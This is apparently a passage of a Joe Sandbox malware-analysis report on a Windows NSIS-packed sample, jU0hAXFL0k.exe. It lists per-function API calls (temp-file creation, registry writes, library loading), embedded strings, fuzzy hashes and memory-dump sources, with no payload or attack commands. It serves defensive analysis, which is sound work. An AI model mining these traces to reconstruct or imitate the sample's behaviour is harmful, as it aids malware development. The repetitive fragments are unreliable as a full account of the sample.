                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\jU0hAXFL0k.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                        • API String ID: 2803837635-2486869544
                                                                                        • Opcode ID: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
                                                                                        • Instruction ID: 90621c4e807be281ea96420bab05d42ad29c2ea1f6fd119d4e9c070f99f8684f
                                                                                        • Opcode Fuzzy Hash: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
                                                                                        • Instruction Fuzzy Hash: 1A51F771A00216ABDF209F61DE89B9E7BB8EB54355F50403BF900B72C1C6BC9E4197AD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        • Graph rendering not recoverable in text; function entry block 405ffc-406007, exit via 406240-406241 (GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree, lstrcatA, lstrlenA)
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406127
                                                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000), ref: 0040613A
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00405139,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000), ref: 00406176
                                                                                        • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406184
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00406190
                                                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061B4
                                                                                        • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,00000000,004168C0,00000000), ref: 00406206
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 717251189-1188836177
                                                                                        • Opcode ID: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                                                                        • Instruction ID: f6f0e3a74e6b455581cb0d86726a6c3d239f08f65b325d122068a3aaf356d786
                                                                                        • Opcode Fuzzy Hash: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                                                                        • Instruction Fuzzy Hash: F4610571A00115ABEF20AF64DC84B7A3BA4DB55314F12417FEA03BA2D2C23C4962DB5E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        • Graph rendering not recoverable in text; function entry block 405101-405116, exit block 4051cc-4051d0 (lstrlenA, lstrcatA, SetWindowTextA, SendMessageA * 3)
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                                                        • lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                                                        • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                                                        • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll), ref: 0040516F
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll
                                                                                        • API String ID: 2531174081-3974561410
                                                                                        • Opcode ID: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                                                                        • Instruction ID: da75402713979d4bf34db42cde910fb2485d85a1008762fbb7bcbbad6d42931f
                                                                                        • Opcode Fuzzy Hash: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                                                                        • Instruction Fuzzy Hash: BB219A71E00108BADF119FA4CD84ADFBFB9EF05354F04807AF404A6291C6798E419FA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        • Graph rendering not recoverable in text; function entry block 4055c7-405612 (CreateDirectoryA), GetLastError / SetFileSecurityA path, exit block 40563f-405641
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                                                                        • GetLastError.KERNEL32 ref: 0040561E
                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405633
                                                                                        • GetLastError.KERNEL32 ref: 0040563D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ls@$|s@
                                                                                        • API String ID: 3449924974-2362640610
                                                                                        • Opcode ID: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                                                                        • Instruction ID: d76da5e920ef4cf84c76b5f8b6eadacb43d526ba9f765b2b55af8eda6d007f2e
                                                                                        • Opcode Fuzzy Hash: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                                                                        • Instruction Fuzzy Hash: 90010871C04219EAEF019BA1CC447EFBBB8EB14355F00853AD905B6290E779A605CFAA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        • Graph rendering not recoverable in text; function entry block 406304-406324 (GetSystemDirectoryA), ending in 40633d-40636f (wsprintfA, LoadLibraryExA)
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
                                                                                        • wsprintfA.USER32 ref: 00406354
                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 00406368
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                        • API String ID: 2200240437-4240819195
                                                                                        • Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                                                        • Instruction ID: 15cbb93803340843acffe9ced60e7e2f3372dd006ff9664fb566d465880257e2
                                                                                        • Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                                                        • Instruction Fuzzy Hash: C8F09C30900116ABDB159768DD0DFFB365CEB08309F14057AB986E11D1D574E9258B99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (basic blocks 402ffb-4031d4; graph rendering not recoverable from the page)
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountTick$wsprintf
                                                                                        • String ID: ... %d%%
                                                                                        • API String ID: 551687249-2449383134
                                                                                        • Opcode ID: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                                                                        • Instruction ID: eed10709806649b2ce9ecdbe6bed08e8f554dc741dea3641cf9b2fc180d08aa2
                                                                                        • Opcode Fuzzy Hash: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                                                                        • Instruction Fuzzy Hash: A7515E71901219ABDB10EF65D904A9F3BB8AF48756F14413BFD10BB2C0C7789E51CBAA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (basic blocks 405ba2-405be9; graph rendering not recoverable from the page)
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00405BB6
                                                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,?,0000000A), ref: 00405BD0
                                                                                        Strings
                                                                                        • "C:\Users\user\Desktop\jU0hAXFL0k.exe", xrefs: 00405BA2
                                                                                        • nsa, xrefs: 00405BAD
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                        • API String ID: 1716503409-2280932713
                                                                                        • Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                                                        • Instruction ID: 2f7af396f84d097035df83fe1d719984909df90e6a6ed76a9758152acb097983
                                                                                        • Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                                                        • Instruction Fuzzy Hash: B9F082367082086BEB108F5ADC04B9B7BA8DF91750F14803BFA08DA291D6B4B9548B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (basic blocks 6fe916db-6fe91836; graph rendering not recoverable from the page)
                                                                                        APIs
                                                                                          • Part of subcall function 6FE91A98: GlobalFree.KERNEL32(?), ref: 6FE91D09
                                                                                          • Part of subcall function 6FE91A98: GlobalFree.KERNEL32(?), ref: 6FE91D0E
                                                                                          • Part of subcall function 6FE91A98: GlobalFree.KERNEL32(?), ref: 6FE91D13
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE91786
                                                                                        • FreeLibrary.KERNEL32(?), ref: 6FE91809
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE9182E
                                                                                          • Part of subcall function 6FE922AF: GlobalAlloc.KERNEL32(?,?), ref: 6FE922E0
                                                                                          • Part of subcall function 6FE926B2: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,6FE91757,00000000), ref: 6FE92782
                                                                                          • Part of subcall function 6FE9156B: wsprintfA.USER32 ref: 6FE91599
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3962662361-3916222277
                                                                                        • Opcode ID: 3bf192cc297539894bf91da7f54f33065b868d68d9919d8c210ce840fc45b3c7
                                                                                        • Instruction ID: 9d62924d229293546cd0e1da57b51bf57e3fa492d0b948ef069826d9387bc921
                                                                                        • Opcode Fuzzy Hash: 3bf192cc297539894bf91da7f54f33065b868d68d9919d8c210ce840fc45b3c7
                                                                                        • Instruction Fuzzy Hash: 8F41A0711013059BDF009FB499C4BDA3FADBF06368F24846AE9159A2C6DB79A045CBB2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (basic blocks 401c0a-401cd2 and 4029b8-4029c7; graph rendering not recoverable from the page)
                                                                                        APIs
                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                                                                        • Instruction ID: 5540d85999f992b2d0d9c3d63f09df6deeece4c427f082cd61f041684b2cd5b6
                                                                                        • Opcode Fuzzy Hash: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                                                                        • Instruction Fuzzy Hash: 6E216BB1D48208BEEF06AFB4D98AAAD7FB5EB44304F10447EF501B61D1C7B89640DB18
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000023,00000011,00000002), ref: 00402488
                                                                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004024C5
                                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,00000011,00000002), ref: 004025A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseValuelstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp
                                                                                        • API String ID: 2655323295-3296606243
                                                                                        • Opcode ID: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
                                                                                        • Instruction ID: 8e9ea0cf859de5a6fe7672b5a81e2234dbec8cc7450cb22075f11fbb1059ccd6
                                                                                        • Opcode Fuzzy Hash: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
                                                                                        • Instruction Fuzzy Hash: 42119072E00218BEEB01AFA58E49EAE7BB8FB48314F20443BF504B71C1C6B85D419B58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNELBASE(00000000,?,?), ref: 00402095
                                                                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                                                          • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                                                          • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll), ref: 0040516F
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD
                                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,?,?,?), ref: 004020A5
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,?,?), ref: 0040211F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2987980305-0
                                                                                        • Opcode ID: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
                                                                                        • Instruction ID: 97d835e61fc7e0b97890b4be7664cc53dce4a02014942e479506a03d8351e840
                                                                                        • Opcode Fuzzy Hash: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
                                                                                        • Instruction Fuzzy Hash: 4521D871A00214BBCF117FA4CE8DAAE79B4AB44319F20413BFA01B62D0C6FD9981D65E
                                                                                        Uniqueness

